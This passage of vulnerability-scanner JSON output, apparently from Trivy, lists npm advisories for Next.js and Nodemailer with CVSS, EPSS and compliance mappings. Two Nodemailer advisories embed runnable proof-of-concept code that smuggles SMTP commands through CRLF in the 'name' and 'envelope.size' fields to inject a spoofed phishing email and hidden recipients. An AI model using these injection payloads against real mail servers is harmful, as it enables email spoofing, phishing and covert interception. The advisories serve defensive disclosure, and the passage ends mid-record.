"https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5355cf71971ed497dc9db80439cbc15aecaca5f44147444b410ea52d3870a09d", "Title": "Next.js vulnerable to cache poisoning via collisions in React Server Component cache-busting", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "LOW", "CweIDs": [ "CWE-328" ], "VendorSeverity": { "ghsa": 1 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 3.7 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949", "https://nvd.nist.gov/vuln/detail/CVE-2026-44582" ], "PublishedDate": "2026-05-13T18:16:19.037Z", "LastModifiedDate": "2026-05-14T18:15:03.26Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.671999999999999, "epss": 0.0002, "epss_percentile": 0.05498, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.0008, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "44b697423f0e8861", "ruleId": "CVE-2025-14874", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "nodemailer: Nodemailer: Denial of service via crafted email address header", "title": "CVE-2025-14874", "description": "A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-14874", "references": [], "tags": [ "vulnerability", "pkg:nodemailer@6.10.1" ], "risk": { "cwe": [ "CWE-703" ] }, "raw": { "VulnerabilityID": "CVE-2025-14874", "VendorIDs": [ "GHSA-rcmh-qjqh-p98v" ], "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "InstalledVersion": "6.10.1", "FixedVersion": "7.0.11", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-14874", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:966cf7be028923c9a0026859ad211dbe6884c63fd7e0af1c79f4c19409cbe98a", "Title": "nodemailer: Nodemailer: Denial of service via crafted email address header", "Description": "A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.", "Severity": "HIGH", "CweIDs": [ "CWE-703" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-14874", "https://bugzilla.redhat.com/show_bug.cgi?id=2418133", "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v", "https://nvd.nist.gov/vuln/detail/CVE-2025-14874", "https://www.cve.org/CVERecord?id=CVE-2025-14874" ], "PublishedDate": "2025-12-18T09:15:44.87Z", "LastModifiedDate": "2026-01-08T03:15:43.19Z" }, "context": { "sbom": { "name": "nodemailer", "version": "6.10.1", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.477999999999998, "epss": 0.00155, "epss_percentile": 0.3573, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0062, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8c54dd19fd34e976", "ruleId": "CVE-2025-13033", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict", "title": "CVE-2025-13033", "description": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-13033", "references": [], "tags": [ "vulnerability", "pkg:nodemailer@6.10.1" ], "risk": { "cwe": [ "CWE-1286" ] }, "raw": { "VulnerabilityID": "CVE-2025-13033", "VendorIDs": [ "GHSA-mm7p-fcc7-pg87" ], "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "InstalledVersion": "6.10.1", "FixedVersion": "7.0.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13033", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:718ace41991afee3a924eee3b40006635632701df5e1f2e2afabf15077a6d79b", "Title": "nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict", "Description": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1286" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P", "V40Score": 5.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:15979", "https://access.redhat.com/errata/RHSA-2026:3751", "https://access.redhat.com/security/cve/CVE-2025-13033", "https://bugzilla.redhat.com/show_bug.cgi?id=2402179", "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87", "https://nvd.nist.gov/vuln/detail/CVE-2025-13033", "https://www.cve.org/CVERecord?id=CVE-2025-13033" ], "PublishedDate": "2025-11-14T20:15:45.957Z", "LastModifiedDate": "2026-05-11T13:16:10.037Z" }, "context": { "sbom": { "name": "nodemailer", "version": "6.10.1", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.349866666666665, "epss": 0.00031, "epss_percentile": 0.0896, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00124, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "314c4b93bbc126bb", "ruleId": "GHSA-vvjj-xcjg-gr5g", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ", "title": "GHSA-vvjj-xcjg-gr5g", "description": "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\\r\\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server to observe injected commands\nconst server = net.createServer(socket => {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data => {\n const lines = data.toString().split('\\r\\n').filter(l => l);\n lines.forEach(line => {\n console.log('SMTP CMD:', line);\n if (line.startsWith('EHLO') || line.startsWith('HELO'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL FROM'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n else if (line === 'DATA')\n socket.write('354 Go\\r\\n');\n else if (line === '.')\n socket.write('250 OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221 Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n host: '127.0.0.1',\n port: port,\n secure: false,\n name: 'legit.host\\r\\nMAIL FROM:\\r\\n'\n + 'RCPT TO:\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject: 'Normal email',\n text: 'Normal content'\n }, () => { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name settings are stored in databases\n- Applications loading SMTP config from environment variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\r\\n]/g, '');\n```", "remediation": "https://github.com/advisories/GHSA-vvjj-xcjg-gr5g", "references": [], "tags": [ "vulnerability", "pkg:nodemailer@6.10.1" ], "raw": { "VulnerabilityID": "GHSA-vvjj-xcjg-gr5g", "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "InstalledVersion": "6.10.1", "FixedVersion": "8.0.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-vvjj-xcjg-gr5g", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:17380daa219fcd2acb5ff13abdf591be99d5ba1498a2e827b85876cb23d42d77", "Title": "Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ", "Description": "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\\r\\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server to observe injected commands\nconst server = net.createServer(socket => {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data => {\n const lines = data.toString().split('\\r\\n').filter(l => l);\n lines.forEach(line => {\n console.log('SMTP CMD:', line);\n if (line.startsWith('EHLO') || line.startsWith('HELO'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL FROM'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n else if (line === 'DATA')\n socket.write('354 Go\\r\\n');\n else if (line === '.')\n socket.write('250 OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221 Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n host: '127.0.0.1',\n port: port,\n secure: false,\n name: 'legit.host\\r\\nMAIL FROM:\\r\\n'\n + 'RCPT TO:\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject: 'Normal email',\n text: 'Normal content'\n }, () => { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name settings are stored in databases\n- Applications loading SMTP config from environment variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\r\\n]/g, '');\n```", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "V3Score": 4.9 } }, "References": [ "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e", "https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g" ], "PublishedDate": "2026-04-08T15:05:20Z", "LastModifiedDate": "2026-04-08T15:05:20Z" }, "context": { "sbom": { "name": "nodemailer", "version": "6.10.1", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "17548d349adde40e", "ruleId": "GHSA-c7w3-x93f-qmm8", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter", "title": "GHSA-c7w3-x93f-qmm8", "description": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` — silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size && this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n<>]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key => {\n if (!standardFields.includes(key)) {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message's `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket => {\n socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk => {\n buffer += chunk.toString();\n const lines = buffer.split('\\r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log('C:', line);\n if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL FROM')) {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\n');\n } else if (line === 'DATA') {\n socket.write('354 Start\\r\\n');\n } else if (line === '.') {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n socket.write('221 Bye\\r\\n');\n socket.end();\n }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n const port = server.address().port;\n console.log('SMTP server on port', port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n port,\n secure: false,\n tls: { rejectUnauthorized: false },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n to: 'recipient@example.com',\n subject: 'Normal email',\n text: 'This is a normal email.',\n envelope: {\n from: 'sender@example.com',\n to: ['recipient@example.com'],\n size: '100\\r\\nRCPT TO:',\n },\n }, (err) => {\n if (err) console.error('Error:', err.message);\n console.log('\\nExpected output above:');\n console.log(' C: MAIL FROM: SIZE=100');\n console.log(' C: RCPT TO: <-- INJECTED');\n console.log(' C: RCPT TO:');\n server.close();\n transporter.close();\n });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM: SIZE=100\nC: RCPT TO:\nC: RCPT TO:\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization's SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.", "remediation": "https://github.com/advisories/GHSA-c7w3-x93f-qmm8", "references": [], "tags": [ "vulnerability", "pkg:nodemailer@6.10.1" ], "raw": { "VulnerabilityID": "GHSA-c7w3-x93f-qmm8", "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "InstalledVersion": "6.10.1", "FixedVersion": "8.0.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-c7w3-x93f-qmm8", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:db7b269ba78fc172252ce3cd328867fff8504078f310f34689e0690febfd1a1e", "Title": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter", "Description": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` — silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size && this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n<>]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 